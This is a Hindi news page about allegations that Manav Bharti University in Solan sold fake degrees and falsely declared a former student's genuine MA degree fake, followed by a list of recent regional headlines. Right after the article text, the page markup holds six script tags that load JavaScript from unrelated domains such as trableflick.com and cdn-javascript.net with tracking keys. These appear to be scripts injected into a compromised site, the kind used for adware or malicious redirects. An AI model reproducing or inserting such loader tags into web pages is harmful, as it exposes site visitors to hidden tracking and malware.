Categories: हिमाचल

फर्जी डिग्री मामलाः हरियाणा की महिला ने मानव भारती युनिवर्सिटी पर लगाया लोगों से पैसे ऐंठे कर फर्जी डिग्री देने का आरोप

<p>राजधानी में हरियाणा की एक महिला ममता ने फर्जी डिग्री प्रकरण में फंसी सोलन की मानव भारती निजी विश्वविद्यालय पर उसके भविष्य के साथ खिलवाड़ करने का आरोप लगाया है। ममता का कहना है कि यह निजी विवि फर्जी डिग्रीयां बेचने के साथ अपनी वास्तविक डिग्री को फर्जी बताने का गोरखधंधा कर लोगों से पैसे ऐंठने का काम कर रहा है। महिला के मुताबिक उसने मानव भारती विवि से मनोविज्ञान में एमए किया और निजी विवि द्वारा उसे डिग्री दी गई। लेकिन बाद में षडयंत्र के तहत विवि ने उसकी डिग्री को ही पूरी तरह फर्जी करार दिया और उसके विरूद्व एफआईआर दर्ज करवाई गई। इस वजह से उसे हरियाणा में रोजगार अधिकारी की सरकारी नौकरी से भी हाथ धोना पड़ा।</p>

<p>शिमला में प्रेस कॉन्फ्रेंस में महिला ने कहा कि उन्होंने साल 2009 में 50 हजार रूपये फीस देकर मानव भारती विवि से एमए मनोविज्ञान में दाखिला लिया। मानव भारती विवि के करनाल स्थित स्टडी सेंटर में इसकी कक्षाएं लगीं। 2011 में एमए उतीर्ण की और 2012 में निजी विवि के बताए गए पते पर 250 रूपये का बैंक ड्राफ्ट भेजा और अपनी डिग्री की वैरिफिकेशन मांगी। निजी विवि ने उसकी डिग्री को वेरिफाई भी कर दिया। साल 2014 में उसका हरियाणा में रोजगार अधिकारी के पद पर चयन हुआ।</p>

<p>ममता ने बताया कि समूचे मामले को हिमाचल पुलिस महानिदेशक एसआर मरड़ी से भी उठाया और उन्होंने जांच के लिए एसआईटी का गठन किया। एसआईटी ने रातों रात निजी विवि में रेड कर लगभग 1375 खाली डिग्रियां और बिना जांची उत्तर पुस्तिकें बरामद की हैं। साथ ही निजी विवि के विरूद्व एफआईआर भी दर्ज की गई है। उन्होंने सभी निजी विवि की जांच उच्चतम न्यायालय के न्यायाधीश से करवाने की सरकार से मांग उठाई है।</p>

<p><img src=”/media/gallery/images/image(5884).jpeg” style=”height:320px; width:640px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_860290228&key=21aca573d498d25317&cv=1584274240&t=1584274240132″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_643254603&key=21aca573d498d25317&cv=17767&t=1584274240132″ type=”text/javascript”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1584274240137″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

19 mins ago

शहीदों को नमन, शहीद स्मारक पर दी गई श्रद्धांजलि

  Mandi: भूतपूर्व सैनिक लीग मंडी द्वारा सोमवार को मंडी के शहीद स्मारक में 1965…

33 mins ago

आरक्षण पर कुठाराघात, केंद्र सरकार पर प्रेम कौशल का निशाना

  Hamirpur: हिमाचल प्रदेश कांग्रेस के मुख्य प्रवक्ता प्रेम कौशल ने कहा कि दलित वर्ग…

40 mins ago

मंडी में हिमाचल ग्रामीण बैंक कर्मचारियों का विरोध प्रदर्शन, मांगों को लेकर गरजे

  Mandi: हिमाचल ग्रामीण बैंक कर्मचारियों द्वारा विभिन्न मांगों को लेकर सोमवार को हिमाचल प्रदेश…

46 mins ago

कांगड़ा बनेगा वल्चर सेफ जोन, गिद्धों के संरक्षण की पहल

Hamirpur: कांगड़ा जिले में गिद्धों के 506 नए घोंसले मिलने के बाद इसे वल्चर सेफ…

56 mins ago

विक्रमादित्य की चेतावनी: कंगना माफी मांगें, वरना मानहानि का सामना करें

  Shimla: मंडी से सांसद कंगना रनौत के बयान पर मंत्री विक्रमादित्य सिंह पलटवार किया…

4 hours ago